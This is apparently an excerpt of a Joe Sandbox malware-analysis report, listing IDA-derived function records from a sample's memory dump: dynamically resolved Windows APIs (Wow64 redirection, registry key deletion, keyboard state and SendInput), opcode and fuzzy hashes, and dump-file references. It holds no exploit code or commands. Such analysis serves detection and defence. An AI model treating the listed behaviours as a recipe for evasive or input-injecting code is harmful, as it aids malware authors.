                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: AddressLibraryLoadProc
                                                                        • String ID: GetProcessId$kernel32.dll
                                                                        • API String ID: 2574300362-399901964
                                                                        • Opcode ID: b408a52f6ab752f5ace6d14514d6dc2d15a99d97d4351b874736b108c2aa6983
                                                                        • Instruction ID: 069f1e6b86de7c2e17a3acecd37bde2c25d8ba526bde5fb83934fb4d57c063ab
                                                                        • Opcode Fuzzy Hash: b408a52f6ab752f5ace6d14514d6dc2d15a99d97d4351b874736b108c2aa6983
                                                                        • Instruction Fuzzy Hash: 79D0A7398187129FC7299F35F80860177E8EF46315F104419EC55E2150D7B0D8C4D790
                                                                        APIs
                                                                        • LoadLibraryA.KERNEL32(kernel32.dll,008F41BB,008F4341,?,008F422F,?,008F41BB,?,?,?,?,008F39FE,?,00000001), ref: 008F4359
                                                                        • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 008F436B
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: AddressLibraryLoadProc
                                                                        • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                        • API String ID: 2574300362-3689287502
                                                                        • Opcode ID: 823893dcfb88403402d2c583a3d48917bc3a6e3702e52cbdd6f33522ee229846
                                                                        • Instruction ID: d1b0bae8aa11207f0ea1881f1d49bdaa1ca49fa2fbb78936530da7b23a583036
                                                                        • Opcode Fuzzy Hash: 823893dcfb88403402d2c583a3d48917bc3a6e3702e52cbdd6f33522ee229846
                                                                        • Instruction Fuzzy Hash: 80D0A73141C7129FC7244F34E808A1377E4FF5171DB21841AE895D2250D7B0D8C0C750
                                                                        APIs
                                                                        • LoadLibraryA.KERNEL32(oleaut32.dll,?,0093051D,?,009305FE), ref: 00930547
                                                                        • GetProcAddress.KERNEL32(00000000,RegisterTypeLibForUser), ref: 00930559
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: AddressLibraryLoadProc
                                                                        • String ID: RegisterTypeLibForUser$oleaut32.dll
                                                                        • API String ID: 2574300362-1071820185
                                                                        • Opcode ID: b54bbeb02cf917cac256278922e831ed046f396e60ca85a6b4dba481934578e7
                                                                        • Instruction ID: 981f3d4beb56838d39c3a1ada59eaf720f999cd35744043558dcccd606a51e1f
                                                                        • Opcode Fuzzy Hash: b54bbeb02cf917cac256278922e831ed046f396e60ca85a6b4dba481934578e7
                                                                        • Instruction Fuzzy Hash: D4D0A73141C7129FC7208F25E80860177F8AF41315F50C41DF48AD2150D674C8C0CE50
                                                                        APIs
                                                                        • LoadLibraryA.KERNEL32(oleaut32.dll,00000000,0093052F,?,009306D7), ref: 00930572
                                                                        • GetProcAddress.KERNEL32(00000000,UnRegisterTypeLibForUser), ref: 00930584
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: AddressLibraryLoadProc
                                                                        • String ID: UnRegisterTypeLibForUser$oleaut32.dll
                                                                        • API String ID: 2574300362-1587604923
                                                                        • Opcode ID: 8772c2ebdcd0f93c9fa9f4eb5cb45235d2c4b25fedbb2cf4e94d193fad296410
                                                                        • Instruction ID: 2c72bb05ef554627c7a6b6e93d618f7ef659cabecdd1d036ea6fa02bd0a7441a
                                                                        • Opcode Fuzzy Hash: 8772c2ebdcd0f93c9fa9f4eb5cb45235d2c4b25fedbb2cf4e94d193fad296410
                                                                        • Instruction Fuzzy Hash: 97D0A7325183129FC7205F35E809B027BF8AF45314F50841DF845D2150D770C8C0CE60
                                                                        APIs
                                                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,0094ECBE,?,0094EBBB), ref: 0094ECD6
                                                                        • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0094ECE8
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: AddressLibraryLoadProc
                                                                        • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                                        • API String ID: 2574300362-1816364905
                                                                        • Opcode ID: cf612eff72676c4c799a06cbc079756310289567a7cf592fcdb5ee496cc0c9ed
                                                                        • Instruction ID: 6b39677dfa655a24bf44e5cbded8ddd99f8ed7bd885ea6654eb1151c74e7e328
                                                                        • Opcode Fuzzy Hash: cf612eff72676c4c799a06cbc079756310289567a7cf592fcdb5ee496cc0c9ed
                                                                        • Instruction Fuzzy Hash: 2DD0A7314187239FCF245F65E888A0277F8BF45315B108419FC89D2191DBB0C8C0D750
                                                                        APIs
                                                                        • LoadLibraryA.KERNEL32(kernel32.dll,00000000,0094BAD3,00000001,0094B6EE,?,0098DC00), ref: 0094BAEB
                                                                        • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 0094BAFD
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: AddressLibraryLoadProc
                                                                        • String ID: GetModuleHandleExW$kernel32.dll
                                                                        • API String ID: 2574300362-199464113
                                                                        • Opcode ID: 887ac2ce6f3cc951012dd9ba20e6b5f2cc94b289b71d1936c1c30fba30082a1b
                                                                        • Instruction ID: 00b47632ba47bb661711b6eff34426217ffd2c1bbb8a8b5532b66cae81af377a
                                                                        • Opcode Fuzzy Hash: 887ac2ce6f3cc951012dd9ba20e6b5f2cc94b289b71d1936c1c30fba30082a1b
                                                                        • Instruction Fuzzy Hash: 50D0A9318187229FCB345F26E848F1277E8EF41318B10842AE88BE2250EBB0C8C0CB90
                                                                        APIs
                                                                        • LoadLibraryA.KERNEL32(advapi32.dll,?,00953BD1,?,00953E06), ref: 00953BE9
                                                                        • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00953BFB
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: AddressLibraryLoadProc
                                                                        • String ID: RegDeleteKeyExW$advapi32.dll
                                                                        • API String ID: 2574300362-4033151799
                                                                        • Opcode ID: 1782cde424668c0ed94d93f29f0dd10810af048adcad516ed0ed4d198a75f5fd
                                                                        • Instruction ID: a5caa4c5fc5e3020785b852bbe358ac5e597a5cf26cc19ff3a27cc0f6a88e38d
                                                                        • Opcode Fuzzy Hash: 1782cde424668c0ed94d93f29f0dd10810af048adcad516ed0ed4d198a75f5fd
                                                                        • Instruction Fuzzy Hash: 43D0A771418752EFC7209F61E808607BBF8AF42329B108469EC89E2150D6F0C4C4CF50
                                                                        APIs
                                                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,0090DF7F,?,0090DEA0,0098DC38,?,?), ref: 0090DF97
                                                                        • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 0090DFA9
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: AddressLibraryLoadProc
                                                                        • String ID: IsWow64Process$kernel32.dll
                                                                        • API String ID: 2574300362-3024904723
                                                                        • Opcode ID: 4a597ecd46b57e89297e1ee4b951e50644cc5730e22892cd6bb835a58188e7ef
                                                                        • Instruction ID: 385c2591f4249cffbd30d12cdff767bd7641ed32ff0e65480314314745b3f65c
                                                                        • Opcode Fuzzy Hash: 4a597ecd46b57e89297e1ee4b951e50644cc5730e22892cd6bb835a58188e7ef
                                                                        • Instruction Fuzzy Hash: B5D0A73142D7139FC7344F64E808602BBE8AF01324B50C42DEC46D2290D770CCC0C790
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 2dee56bffeba2b5ff479a9890d49d5a2b916b3e8ea6cb73680691d4ccfd3a69b
                                                                        • Instruction ID: 88a446f471d4f22452a50769c71ea53c7fb68b8634ffb8b1d250f02ea2240b71
                                                                        • Opcode Fuzzy Hash: 2dee56bffeba2b5ff479a9890d49d5a2b916b3e8ea6cb73680691d4ccfd3a69b
                                                                        • Instruction Fuzzy Hash: 2BC17E75A0022AEFCB14CF94D884BAEB7B9FF48700F114598E945EB295D730DE81DBA0
                                                                        APIs
                                                                        • CoInitialize.OLE32(00000000), ref: 0094AAB4
                                                                        • CoUninitialize.OLE32 ref: 0094AABF
                                                                          • Part of subcall function 00930213: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0093027B
                                                                        • VariantInit.OLEAUT32(?), ref: 0094AACA
                                                                        • VariantClear.OLEAUT32(?), ref: 0094AD9D
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                                        • String ID:
                                                                        • API String ID: 780911581-0
                                                                        • Opcode ID: b95f2577690f2669f1d1898b2a0da9a1589efda7d144cfcceae21829b8d055ea
                                                                        • Instruction ID: 33f0283cbd3bd6142458d1027d3b74485620c98f6f4a6182e28e615dfbc78d9a
                                                                        • Opcode Fuzzy Hash: b95f2577690f2669f1d1898b2a0da9a1589efda7d144cfcceae21829b8d055ea
                                                                        • Instruction Fuzzy Hash: 13A124756447019FCB10DF28C491F2AB7E9BF88710F148849FA9A9B3A1DB34ED44CB86
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: Variant$AllocClearCopyInitString
                                                                        • String ID:
                                                                        • API String ID: 2808897238-0
                                                                        • Opcode ID: 7a5f04add5f559e0c723bc5c7cd7e5f6925f8f71599e25a412063a64ec611d2a
                                                                        • Instruction ID: 7dab74a3ccc7b784e2b6bc44490a426ba060e4772faf8d1a240a923d1181daa1
                                                                        • Opcode Fuzzy Hash: 7a5f04add5f559e0c723bc5c7cd7e5f6925f8f71599e25a412063a64ec611d2a
                                                                        • Instruction Fuzzy Hash: E6519531604316DBDB34EF69E895B2EB3E9EF85314F20881FE596CB2E5DB7498808705
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: _memset$__filbuf__getptd_noexit_memcpy_s
                                                                        • String ID:
                                                                        • API String ID: 3877424927-0
                                                                        • Opcode ID: 065ad613f1183b824f05baa70d3d15c8958660488bca00daffb81e2f860a9d07
                                                                        • Instruction ID: 3f0697fba27e0e7b4a9a40ac6b83ba5a15dad8398776b442d76814e595ee3a64
                                                                        • Opcode Fuzzy Hash: 065ad613f1183b824f05baa70d3d15c8958660488bca00daffb81e2f860a9d07
                                                                        • Instruction Fuzzy Hash: 555195B4B0030DEBDB249F6989856EE7BB9AF40360F24C769F825962D0D7759FD08B40
                                                                        APIs
                                                                        • GetWindowRect.USER32(01036170,?), ref: 0095C544
                                                                        • ScreenToClient.USER32(?,00000002), ref: 0095C574
                                                                        • MoveWindow.USER32(00000002,?,?,?,000000FF,00000001,?,00000002,?,?,?,00000002,?,?), ref: 0095C5DA
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: Window$ClientMoveRectScreen
                                                                        • String ID:
                                                                        • API String ID: 3880355969-0
                                                                        • Opcode ID: 62f520762dbd81c1b9e9b82dd56aab95ca5d293b663a0a36a7395f5c7488fb8d
                                                                        • Instruction ID: cc785007a6e445974b87cf54a36083e027d56ff407713111200bfc321fce126c
                                                                        • Opcode Fuzzy Hash: 62f520762dbd81c1b9e9b82dd56aab95ca5d293b663a0a36a7395f5c7488fb8d
                                                                        • Instruction Fuzzy Hash: 18518FB5901209EFCF10DF69C880AAE77B9FF44721F208259F91597290E730ED85CB90
                                                                        APIs
                                                                        • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 0092C462
                                                                        • __itow.LIBCMT ref: 0092C49C
                                                                          • Part of subcall function 0092C6E8: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 0092C753
                                                                        • SendMessageW.USER32(?,0000110A,00000001,?), ref: 0092C505
                                                                        • __itow.LIBCMT ref: 0092C55A
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$__itow
                                                                        • String ID:
                                                                        • API String ID: 3379773720-0
                                                                        • Opcode ID: 29b78010818d397c5171933a5a153e179c23bb4501ed45b6223dc22be47ff77a
                                                                        • Instruction ID: ddb65a4a458e0b7235a5d4505dfdcc737966448176e995792a8e9d0ed01f35cd
                                                                        • Opcode Fuzzy Hash: 29b78010818d397c5171933a5a153e179c23bb4501ed45b6223dc22be47ff77a
                                                                        • Instruction Fuzzy Hash: 52419671A0061D6BDF11EF68D851FFE7BB9EF45710F000019F605E7191DB74AA458B92
                                                                        APIs
                                                                        • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00933966
                                                                        • SetKeyboardState.USER32(00000080,?,00000001), ref: 00933982
                                                                        • PostMessageW.USER32(00000000,00000102,?,00000001), ref: 009339EF
                                                                        • SendInput.USER32(00000001,?,0000001C,00000000,?,00000001), ref: 00933A4D
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: KeyboardState$InputMessagePostSend
                                                                        • String ID:
                                                                        • API String ID: 432972143-0
                                                                        • Opcode ID: 47fc123bd96802a327dd59075a80a56d048015e6de040dddb08dcd289d124ce0
                                                                        • Instruction ID: a14f6fd3328f06f2bb354fce714e386e17eb45f4175360e0687cfa470cdb8642
                                                                        • Opcode Fuzzy Hash: 47fc123bd96802a327dd59075a80a56d048015e6de040dddb08dcd289d124ce0
                                                                        • Instruction Fuzzy Hash: D3412770E84208EEEF308B648806BFDBBB9AF95311F04815AF4C1962C1C7B48E85DF61
                                                                        APIs
                                                                        • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 0095B5D1
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: InvalidateRect
                                                                        • String ID:
                                                                        • API String ID: 634782764-0
                                                                        • Opcode ID: 4d82b5da10a7b869bd27d1fccaf42350aaef7e9b121c739c8ace99c063f61625
                                                                        • Instruction ID: d768649aed93f3ecddac3e6745a30ef1b235fe2aac54f767c6fa8006b7a61113
                                                                        • Opcode Fuzzy Hash: 4d82b5da10a7b869bd27d1fccaf42350aaef7e9b121c739c8ace99c063f61625
                                                                        • Instruction Fuzzy Hash: 97310275612208BFEF28DF1ACC89FAC3768EB06322F604501FE11D61E1E734A9899B51
                                                                        APIs
                                                                        • ClientToScreen.USER32(?,?), ref: 0095D807
                                                                        • GetWindowRect.USER32(?,?), ref: 0095D87D
                                                                        • PtInRect.USER32(?,?,0095ED5A), ref: 0095D88D
                                                                        • MessageBeep.USER32(00000000), ref: 0095D8FE
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: Rect$BeepClientMessageScreenWindow
                                                                        • String ID:
                                                                        • API String ID: 1352109105-0
                                                                        • Opcode ID: 81784227a1c0cc234a383b91809bb789c7df7839f414a256b482a354201fabaf
                                                                        • Instruction ID: 6b5bf13d2f2536674001f1757db73c3c8a68a4881c5d2529a6345e75d942bbaf
                                                                        • Opcode Fuzzy Hash: 81784227a1c0cc234a383b91809bb789c7df7839f414a256b482a354201fabaf
                                                                        • Instruction Fuzzy Hash: E441E274A12209DFCB21DF5AC884B697BF5FF49322F1881A9EA14CF260D330E849DB40
                                                                        APIs
                                                                        • GetKeyboardState.USER32(?,7707C0D0,?,00008000), ref: 00933AB8
                                                                        • SetKeyboardState.USER32(00000080,?,00008000), ref: 00933AD4
                                                                        • PostMessageW.USER32(00000000,00000101,00000000,?), ref: 00933B34
                                                                        • SendInput.USER32(00000001,?,0000001C,7707C0D0,?,00008000), ref: 00933B92
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: KeyboardState$InputMessagePostSend
                                                                        • String ID:
                                                                        • API String ID: 432972143-0
                                                                        • Opcode ID: 7c5ee5cdca212b70b738e54bbef72e61216daf747d891f53ac6d67b361724fb6
                                                                        • Instruction ID: 9cfe16aca4721122140ac8120040c7443149b0ed028041df212cd9a4d47dd7f2
                                                                        • Opcode Fuzzy Hash: 7c5ee5cdca212b70b738e54bbef72e61216daf747d891f53ac6d67b361724fb6
